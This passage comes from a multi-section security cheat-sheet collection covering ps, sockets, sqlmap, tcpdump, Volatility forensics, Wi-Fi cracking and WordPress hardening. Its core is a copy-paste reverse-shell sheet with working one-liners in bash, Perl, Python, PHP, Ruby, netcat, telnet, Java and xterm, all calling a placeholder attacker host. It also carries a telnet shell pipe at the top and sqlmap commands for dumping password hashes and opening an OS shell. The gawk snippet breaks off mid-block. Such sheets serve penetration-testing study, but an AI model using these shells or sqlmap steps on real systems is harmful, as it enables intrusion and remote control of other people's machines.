# On the target machine:
telnet [attack host] 80 | /bin/bash | telnet [attack host] 443


--------------------------------------------------------------------------------
/ps:
--------------------------------------------------------------------------------
# alex
# To list every process on the system:
ps aux

# To list a process tree
ps axjf

# To list every process owned by foouser:
ps -aufoouser

# To list every process with a user-defined format:
ps -eo pid,user,command

# List the processes being run by a particular set of usernames (comma-separated, no spaces)
ps -f -u username1,username2,...,usernameN

# Display a list of processes with a particular parent ID (5589)
# Note that when a process is launched it may spawn several other sub-processes which all share a common parent process ID
ps -f --ppid 5589

# List processes with given PIDs
ps -f -p 25001,4567,789

# Display all processes owned by the current user
ps -U $USER

# Sort processes based on CPU and memory usage (useful for finding memory leaks)
ps aux --sort pmem

--------------------------------------------------------------------------------
/python:
--------------------------------------------------------------------------------
# alex

# Network Programming Basics (Python)

# To use the socket module
import socket

# To create a new socket object (defaults to AF_INET / SOCK_STREAM, i.e. TCP over IPv4)
sock = socket.socket()

# To get your local machine's name
host = socket.gethostname()

# To declare a port for your service
port = 80

# To bind a (hostname, port number) pair to a socket
# Note: bind() takes the pair as a single tuple argument
sock.bind((host, port))

# To set up and start a TCP listener (wait for client connection)
sock.listen()

# To accept a connection
# Note: accept() returns a (conn, address) pair where conn is a new socket object that can be used to send/receive data on the connection. Address refers to the address bound on the other end of the connection.
connection, address = sock.accept()

# To transmit a TCP message (continuing from previous example)
# Note: under Python 3 sockets send bytes, not str
connection.send(b'Message goes here')

# To transmit a UDP message
# Note: use a datagram socket and do not connect it to a remote socket, because sendto() takes the destination address explicitly
udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_sock.sendto(b'Message goes here', destination_address)

# To close the connection
connection.close()

# To receive TCP data from a socket (assuming s is the socket on the client side).
1024 is the buffer size and data is a bytes object.
data = s.recv(1024)

# To receive UDP data from a socket
# Note: recvfrom() returns a (bytes, address) pair, where bytes is the data received and address represents the address of the socket from which the message was sent. 1024 is again the buffer size.
data, addr = s.recvfrom(1024)

# To get the remote address that a socket is connected to (ask the accepted connection, not the listening socket)
connection.getpeername()



--------------------------------------------------------------------------------
/reverse-shell:
--------------------------------------------------------------------------------
# Reverse Shell Cheat Sheet
# Uses info from:
# http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# http://bernardodamele.blogspot.com.br/2011/09/reverse-shells-one-liners.html
# http://www.gnucitizen.org/blog/reverse-shell-with-bash/

If you're lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you'll probably want an interactive shell.

If it's not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either throwing back a reverse shell or binding a shell to a TCP port. This page deals with the former.

Your options for creating a reverse shell are limited by the scripting languages installed on the target system, though you could probably upload a binary program too if you're suitably well prepared.

The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you substitute "/bin/sh -i" with "cmd.exe".

Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they're quite short lines, but not very readable.

# Bash
Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
OR
exec /bin/bash 0&0 2>&0
OR
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
OR
exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done


# PERL
Here's a short, feature-free version that depends on /bin/sh:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Shorter Perl reverse shell that does not depend on /bin/sh:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

If the target system is running Windows use the following one-liner:
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'


# Python
This was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


# PHP
This code assumes that the TCP connection uses file descriptor 3. This worked on my test system.
If it doesn't work, try 4, 5, 6...
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'


# Ruby
Short version that depends on /bin/sh:
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Longer Ruby reverse shell that does not depend on /bin/sh:
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

If the target system is running Windows use the following one-liner:
ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'


# Netcat
Netcat is rarely present on production systems and even if it is there are several versions of netcat, some of which don't support the -e option.
nc -e /bin/sh 10.0.0.1 1234

If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Other possible Netcat reverse shells, depending on the Netcat version and compilation flags:
nc -c /bin/sh attackerip 4444
OR
/bin/sh | nc attackerip 4444
OR
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0</tmp/p | /bin/sh 1>/tmp/p


# Telnet
Of course, you can also use Telnet as an alternative for Netcat:
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0</tmp/p | /bin/sh 1>/tmp/p
Or:
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 # Remember to listen on your machine also on port 4445/tcp


# Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()


# gawk
#!/usr/bin/gawk -f

BEGIN {
    Port   = 8080
    Prompt = "bkd> "

    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)


# xterm
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1

To catch the incoming xterm, start an X-Server (:1, which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1

You'll need to authorise the target to connect to you (command also run on your host):
xhost +targetip

--------------------------------------------------------------------------------
/ruby:
--------------------------------------------------------------------------------
# andrew
# currently learning ruby - a few things that I keep forgetting
# sockets
require 'socket'
hostname = 'localhost'
port = 1337
s = TCPSocket.open(hostname, port)
s.close

# for loops
5.times do |i|
  # do something
end
array.each do |n|
  # do something
end

# files
file = File.open("filename", "rb")
contents = file.read
file.close

# sending emails
require 'net/smtp'
message = <<MESSAGE_END
From: 
To: 
Subject: 

Message!
MESSAGE_END

smtp = Net::SMTP.new 'smtp.gmail.com', 587
smtp.enable_starttls
smtp.start('gmail.com', '', '', :login)
smtp.send_message message, '', ''
smtp.finish

# delays
sleep n # number of seconds

# interact with webpages
require 'net/http'
source = Net::HTTP.get('www.example.com', '/dir/index.html')

--------------------------------------------------------------------------------
/shadow:
--------------------------------------------------------------------------------
# andrew
# location
/etc/shadow

# fields (colon-separated, in this order)
username
salt and hashed password
days since epoch of last password change
days until a change is allowed
days before a change is required
days warning for expiration
days before account is inactive
days since epoch when account expires
reserved

# more on the salt/hashed password
$id$salt$hash
1:  MD5
2a: Blowfish
5:  SHA-256
6:  SHA-512

--------------------------------------------------------------------------------
/shodan:
--------------------------------------------------------------------------------
# andrew
# Filter IP range
net:

# Filter port
port:

# Filter location
city:"" country:
geo:

# Filter hostname
hostname:

# Filter operating system
os:

# Filter dates
# Acceptable formats are: day/month/year or day-month-year
before:
after:

--------------------------------------------------------------------------------
/sqlmap:
--------------------------------------------------------------------------------
# andrew
# Jose Moruno

#Automated sqlmap scan
./sqlmap.py -u http://site.com --forms --batch --crawl=2 --cookie="" --level=5 --risk=3

# Test URL and POST data and return database banner (if possible)
./sqlmap.py --url="" --data="" --banner

# Parse
request data and test | request data can be obtained with burp
./sqlmap.py -u [url]

# Use random agent
./sqlmap.py -u [url] --random-agent

# Fingerprint | much more information than banner
./sqlmap.py -u [url] --fingerprint

# Identify WAF
./sqlmap.py -u [url] --check-waf
./sqlmap.py -u [url] --identify-waf

# Get database username, name, and hostname
./sqlmap.py -u [url] --current-user --current-db --hostname

# Check if user is a database admin
./sqlmap.py -u [url] --is-dba

# Get database users and password hashes
./sqlmap.py -u [url] --users --passwords

# Enumerate databases
./sqlmap.py -u [url] --dbs

# List tables for one database
./sqlmap.py -u [url] -D [database] --tables

# Other database commands
./sqlmap.py -u [url] -D [database] --columns
                                   --schema
                                   --count
# Enumeration flags
./sqlmap.py -u [url] -D [database]
                     -T [table]
                     -C [column]
                     -U [user]

# Extract data
./sqlmap.py -u [url] -D [database] -T [table] -C [column] --dump

# Execute SQL Query
./sqlmap.py -u [url] --sql-query=""

# Append/Prepend SQL Queries
./sqlmap.py -u [url] --prefix="" --suffix=""

# Get backdoor access to sql server | can give shell access
./sqlmap.py -u [url] --os-shell

--------------------------------------------------------------------------------
/tcpdump:
--------------------------------------------------------------------------------
# alex

###############
# Basic Usage #
###############

#Capture packets on a particular interface (eth0)
#Note that tcpdump (without the '-i eth0') is also valid if you are only using one interface
tcpdump -i eth0

#Capture packets with more detailed output
tcpdump -i eth0 -nnvvS

#Display captured packets in both HEX and ASCII format
tcpdump -XX -i eth0

#Write captured packets into a file (can be read by tools such as Wireshark, Snort, etc)
tcpdump -w yourfilename.pcap -i eth0

#Read packets from a saved packet capture file
tcpdump -tttt -r yoursavedfile.pcap

#Display IP addresses instead of hostnames when capturing packets
tcpdump -n -i eth0

#Capture packets from a particular source/destination IP address
tcpdump src 192.168.1.1
tcpdump dst 192.168.1.1

#Capture packets from a particular source/destination port number
tcpdump src port 53
tcpdump dst port 21

#Capture an entire network's traffic using CIDR notation
tcpdump net 192.168.1.0/24

#Capture traffic to or from a port
tcpdump port 3389

#Display captured packets above or below a certain size (in bytes)
tcpdump less 64
tcpdump greater 256


##################
# Advanced Usage #
##################

#More complex statements can be formed with the use of logical operators: and(&&), or(||), not(!)
#Examples:

#Capture all traffic from 192.168.1.10 with destination port 80 (with verbose output)
tcpdump -nnvvS src 192.168.1.10 and dst port 80

#Capture traffic originating from the 172.16.0.0/16 network with destination network 192.168.1.0/24 or 10.0.0.0/8
#Note: 'or' binds more loosely than 'and', so the two destination networks must be grouped in parentheses (hence the quotes)
tcpdump 'src net 172.16.0.0/16 and (dst net 192.168.1.0/24 or dst net 10.0.0.0/8)'

#Capture all traffic originating from host H1 that isn't going to port 53
tcpdump src H1 and not dst port 53

#With some complex queries you may have to use single quotes to ignore special characters, namely parentheses
#Capture traffic from 192.168.1.1 that is destined for ports 80 and 21
tcpdump 'src 192.168.1.1 and (dst port 80 or 21)'

--------------------------------------------------------------------------------
/tshark:
--------------------------------------------------------------------------------
#Jose Moruno Cadima
# The Cheat sheet is under construction
# Update 08/09/2015



#Filter with specific IP
tshark -i eth0 host 127.0.0.1

#Filter with port
tshark -i eth0 host 127.0.0.1 and port 8080

#Time duration capture
tshark -i eth0 -a duration:5 -w traffic.pcap
-i to choose the interface on your machine.
-a for duration, which is in seconds.
-w to write the captured packets to the file.

# Capture all udp traffic
tshark udp

#Tshark trace incoming HTTP requests
tshark -i eth0 -R 'http.request'

#Filter with HTTP
tshark -r capture.pcap -Y 'http'

--------------------------------------------------------------------------------
/volatility:
--------------------------------------------------------------------------------
#Memory Forensics CheatSheet (WINDOWS)
#Resource - SANS Memory Forensic Cheat Sheet v1.2
#Jason Soto

============================================================
#Memory Analysis Tools

# Volatility (Windows/Linux/Mac)
https://code.google.com/p/volatility/

#Mandiant Redline (Windows)
http://www.mandiant.com/resources/download/redline

#VolaFox (Mac OS / BSD)
https://github.com/n0fate/volafox

==============================================================
#Volatility Basics
The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples.

#Location in Kali Linux
/usr/share/volatility/vol.py

#Examples
#Show Options and Supported plugins
$ vol.py -h

#Show plugin usage
$ vol.py [plugin] -h

#Identify System Profile
$ vol.py -f mem.img imageinfo
==============================================================
#Identify Rogue Process
#High level view of running processes
$ vol.py pslist -f mem.img

#Scan memory for EPROCESS Blocks
$ vol.py psscan -f mem.img

#Display parent-process relationships
$ vol.py pstree -f
mem.img
===============================================================
#Look for Evidence of Code Injection
#malfind
-p          Show information only for specific PIDs
-o          Provide physical offset of a single process to scan
--dump-dir  Directory to save memory sections

$ vol.py malfind --dump-dir ./output_dir

#ldrmodules
$ vol.py ldrmodules -p 868 -v
===============================================================
#Check for Signs of a Rootkit
#Examples

#Find Hidden processes using cross-view
$ vol.py psxview

#Scan Memory for loaded, unloaded and Unlinked drivers
$ vol.py modscan

#Find API/DLL Function hooks
$ vol.py apihooks
$ vol.py apihooks -p 868    # specific PID
$ vol.py apihooks -Q        # only critical processes

#Hooks in System Service Descriptor Table (grep -E: the pattern uses alternation)
$ vol.py ssdt | grep -Ev '(ntoskrnl|win32k)'

#Display Interrupt Descriptor Table
$ vol.py idt

#Identify I/O Request Packet (IRP) hooks
$ vol.py driverirp -r tcpip
================================================================
#Analyze Process DLLs and Handles
#Examples

#List of loaded dlls by process
$ vol.py dlllist -p 4,868

#Print process security identifiers
$ vol.py getsids -p 868

#List of open handles for each process
-t  Display handles of a certain type
    {Process, Thread, Key, Event, File, Mutant, Token, Port}
$ vol.py handles -p 58 -t Process,Mutant

#Scan memory for FILE_OBJECT handles
$ vol.py filescan

#Scan for Windows Service Information
$ vol.py svcscan
================================================================
#Dump Suspicious Processes and Drivers
#Examples

#Extract DLLs from Specific Processes
#dlldump
-p          Dump DLLs only for specific PIDs
-b          Dump DLLs from process at physical memory offset
-r
            Dump DLLs matching REGEX name
--dump-dir  Directory to save extracted files

$ vol.py dlldump --dump-dir ./output -r metsrv

#Extract kernel drivers
#moddump
-o          Dump driver using offset address (from modscan)
-r          Dump drivers matching REGEX name
--dump-dir  Directory to save extracted files

$ vol.py moddump --dump-dir ./output -r gaopdx

#Dump process to executable sample
#procmemdump
-p          Dump only specific PIDs
-o          Specify process by physical memory offset
--dump-dir  Directory to save extracted files

$ vol.py procmemdump --dump-dir ./output -p 868

#Dump every memory section into a file
-p          Dump memory sections from these PIDs
--dump-dir  Directory to save extracted files

$ vol.py memdump --dump-dir ./output -p 868
================================================================
#Review Network Artifacts
#Examples

#[XP] List of open TCP connections
$ vol.py connections

#[XP] ID TCP connections, including closed
$ vol.py connscan

#[XP] Print listening sockets (any protocol)
$ vol.py sockets

#[XP] ID sockets, including closed/unlinked
$ vol.py sockscan

#[Win7] Scan for connections and sockets
$ vol.py netscan

================================================================

#Memory Acquisition
#Windows Operating Systems
# Win32dd (x86) / Win64dd (x64)

#Example
c:\> win32dd.exe /f E:\memory.img

#MemoryDD.bat

#Example
c:\> MemoryDD.bat --output E:\

#Volatility WinPmem
#Options
-   Output to standard out
-l  Load driver for live memory analysis

=================================================================
#Converting Hibernation Files and Crash Dumps
#Volatility imagecopy
#Options
-f         Name of Source File
-O         Output file Name
--profile  Source OS from imageinfo

#Examples
$ vol.py imagecopy -f hiberfil.sys -O hiber.img --profile=Win7SP1x64
$ vol.py imagecopy -f Memory.dmp -O memdmp.img --profile=Win7SP1x64

===================================================================
#Memory Artifact Timelining

#The Volatility Timeliner plugin parses time-stamped objects found in memory images. Output is sorted by:
Process creation time
Thread creation time
Driver compile time
DLL / EXE compile time
Network socket creation time
Memory resident registry key last write time
Memory resident event log entry creation time

#timeliner
--output-file  Optional file to write output (v2.1)
--output=body  bodyfile format for mactime (v2.3)

$ vol.py -f mem.img timeliner --output-file out.csv --profile=Win7SP1x86

=====================================================================
# Registry Analysis Volatility Plugins
#hivelist - Find and list available registry hives
$ vol.py hivelist

#hivedump - Print all keys and subkeys in a hive
-o  Offset of registry hive to dump (virtual offset)
$ vol.py hivedump -o 0xe1a14b60

#printkey - Output a registry key, subkeys, and values
-K  "Registry key path"
$ vol.py printkey -K "Software\Microsoft\Windows\CurrentVersion\Run"

#userassist - Find and parse userassist key values
$ vol.py userassist

#hashdump - Dump user NTLM and Lanman hashes
-y  Virtual offset of SYSTEM registry hive (from hivelist)
-s  Virtual offset of SAM registry hive (from hivelist)
$ vol.py hashdump -y 0x8781c008 -s 0x87f6b9c8
========================================================================


--------------------------------------------------------------------------------
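The /permissions cheat sheet above states the rule (each of r, w, x is one bit, each triplet one digit) and shows one case, rwx rw- r-- = 764. The following is an added example, not part of the original cheat sheet: it implements the conversion in both directions, extends it to the setuid/setgid/sticky letters (s, S, t, T) that `ls -l` also prints, and flags modes a reviewer would look at twice. All function names are my own.

```python
"""Convert between the symbolic mode shown by `ls -l` and chmod's digits, as in the
/permissions cheat sheet (each of r, w, x is one bit; each triplet is one digit).

Added example, not part of the original cheat sheet. It goes beyond the sheet's
plain rwx case by handling the setuid/setgid/sticky letters (s, S, t, T) and by
flagging modes worth a second look (world-writable, setuid, setgid).
"""
from typing import List


def triplet_to_digit(triplet: str) -> int:
    """'rwx' -> 7, 'rw-' -> 6, 'r--' -> 4; a lowercase s/t means the x bit is set too."""
    if len(triplet) != 3:
        raise ValueError(f"bad triplet: {triplet!r}")
    r, w, x = triplet
    return (4 if r == "r" else 0) | (2 if w == "w" else 0) | (1 if x in "xst" else 0)


def symbolic_to_octal(mode: str) -> str:
    """'rwx rw- r--' or '-rwxrw-r--' -> '764'; '-rwsr-xr-x' -> '4755'."""
    mode = mode.replace(" ", "").rstrip("+.@")  # drop the sheet's spacing and ls ACL/xattr markers
    perms = mode[-9:]                           # strip the leading file-type character, if any
    if len(perms) != 9:
        raise ValueError(f"bad mode string: {mode!r}")
    u, g, o = perms[0:3], perms[3:6], perms[6:9]
    special = (4 if u[2] in "sS" else 0) | (2 if g[2] in "sS" else 0) | (1 if o[2] in "tT" else 0)
    digits = f"{triplet_to_digit(u)}{triplet_to_digit(g)}{triplet_to_digit(o)}"
    return f"{special}{digits}" if special else digits


def octal_to_symbolic(octal: str) -> str:
    """'764' -> 'rwxrw-r--'; '4755' -> 'rwsr-xr-x'; '4644' -> 'rwSr--r--'."""
    value = int(octal, 8)
    special, perm = value >> 9, value & 0o777
    out = []
    for shift, sbit, letter in ((6, 4, "s"), (3, 2, "s"), (0, 1, "t")):
        d = (perm >> shift) & 7
        r = "r" if d & 4 else "-"
        w = "w" if d & 2 else "-"
        if special & sbit:
            x = letter if d & 1 else letter.upper()  # uppercase: special bit set without x
        else:
            x = "x" if d & 1 else "-"
        out.append(r + w + x)
    return "".join(out)


def review_mode(mode: str) -> List[str]:
    """Reviewer notes for a symbolic mode string from `ls -l`."""
    value = int(symbolic_to_octal(mode), 8)
    notes = []
    if value & 0o002:
        notes.append("world-writable")
    if value & 0o4000:
        notes.append("setuid")
    if value & 0o2000:
        notes.append("setgid")
    return notes


if __name__ == "__main__":
    # Constructed sample modes, including the cheat sheet's own "- rw- r-- r--" line
    for line in ("- rw- r-- r--", "rwx rw- r--", "-rwsr-xr-x", "drwxrwxrwt", "-rw-rw-rw-"):
        print(f"{line:14} chmod {symbolic_to_octal(line):>4}  {review_mode(line)}")
```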
/webservervulns:
--------------------------------------------------------------------------------
# angela
#Sample Files
Web servers are hard to build from the ground up, so distributions often ship sample files; knowing which sample files are present can provide openings.

#Source Code Disclosure
Allowing the source code to be viewed can expose holes and make files accessible if they can be found referenced in the code.

#Canonicalization
Errors usually occur when the web server fails to fully apply the rule that every URL or filename for the same resource should reduce to the same root form, and thus the web server will fail to recognize that a URL is associated with a file it addresses.

#Input Validation
A classic hacking target; missing validation can lead to buffer overflows, integer errors, and heap exploits.

#Denial of Service
Attempting to waste server time to get a denial. For example, one can identify many strings that hash to the same location in an environment with a naive programming language hash table implementation.

--------------------------------------------------------------------------------
/wireless-encryptions:
--------------------------------------------------------------------------------
#Wired Equivalent Privacy (WEP)
RC4 stream cipher w/ CRC32 for integrity check
-->Crack:
by sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs
-->Avoidance:
Use WPA2

#Wifi Protected Access (WPA)
Temporal Key Integrity Protocol (TKIP) Message Integrity Check
-->Crack:
Uses a four-way handshake, and if that handshake can be captured, then a dictionary attack can be mounted to find the Pairwise Master Key for the Access Point and client Station
-->Avoidance:
Use long keys

#WPA2
Advanced Encryption Standard (AES)
-->crack and avoidance the same as WPA

--------------------------------------------------------------------------------
/wireshark:
--------------------------------------------------------------------------------
# To start capturing packets on a specified interface
Capture>"Interfaces ...">[Select interface(s)]>Start

# To stop a running capture to analyze the packets
Capture>Stop

# To apply a filter from selected packets in a current or previous capture session
[Right click packet]>"Apply as filter">[Select options]

# To start a session that will only capture packets destined for your device
Capture>"Options...">[Uncheck "Use promiscuous mode on all interfaces"]>Start

# To view all packets of a TCP/UDP/SSL stream
[Right click packet]>"Follow stream"

# To manage decryption keys to decrypt encrypted streams
View>"Wireless Toolbar" then
"Wireless Toolbar">"Decryption Keys..."


--------------------------------------------------------------------------------
/wpHardening:
--------------------------------------------------------------------------------
#WPHardening CheatSheet
#Jason Soto

#WPHardening is a Security Fortification tool for Wordpress

#Clone WPHardening Repo
$ git clone https://github.com/elcodigok/wphardening

#Usage
$ python wphardening.py -d /path/to/wordpress [options]

#Options
--version             show program's version number and exit
-h, --help            show this help message and exit
-v, --verbose         Active verbose mode output results
--update              Check for WPHardening latest stable version

Target:
  This option must be specified to modify the package WordPress.

  -d DIRECTORY, --dir=DIRECTORY
                        **REQUIRED** - Working Directory.
  --load-conf=FILE      Load file configuration.

Hardening:
  Different tools to hardening WordPress.

  -c, --chmod           Chmod 755 in directory and 644 in files.
  -r, --remove          Remove files and directory.
  -b, --robots          Create file robots.txt
  -f, --fingerprinting  Deleted fingerprinting WordPress.
  -t, --timthumb        Find the library TimThumb.
  --wp-config           Wizard generated wp-config.php
  --delete-version      Deleted version WordPress.
  --plugins             Download Plugins Security.
  --proxy=PROXY         Use a HTTP proxy to connect to the target url for
                        --plugins and --wp-config.
  --indexes             It allows you to display the contents of directories.
  --malware-scan        Malware Scan in WordPress project.

Miscellaneous:
  -o FILE, --output=FILE
                        Write log report to FILE.log

#Examples
#Check a WordPress Project
$ python wphardening.py -d /path/to/wordpress -v

#Change permissions
$ python wphardening.py -d /path/to/wordpress --chmod -v

#Remove files that are not in use
$ python wphardening.py -d /path/to/wordpress --remove -v

#Create your robots.txt file
$ python wphardening.py -d /path/to/wordpress --robots -v

#Remove all fingerprinting
$ python wphardening.py -d /path/to/wordpress --fingerprinting -v

#Check for TimThumb library
$ python wphardening.py -d /path/to/wordpress --timthumb -v

#Create Index files
$ python wphardening.py -d /path/to/wordpress --indexes -v

#Download Security Plugins
$ python wphardening.py -d /path/to/wordpress --plugins

#Wizard generated wp-config.php
$ python wphardening.py -d /path/to/wordpress --wp-config

#Deleted version WordPress
$ python wphardening.py -d /path/to/wordpress --delete-version -v

#WPHardening update
$ python wphardening.py --update

#Use all options
$ python wphardening.py -d /home/user/wordpress -c -r -f -t --wp-config --delete-version --indexes --plugins -o /home/user/wphardening.log


--------------------------------------------------------------------------------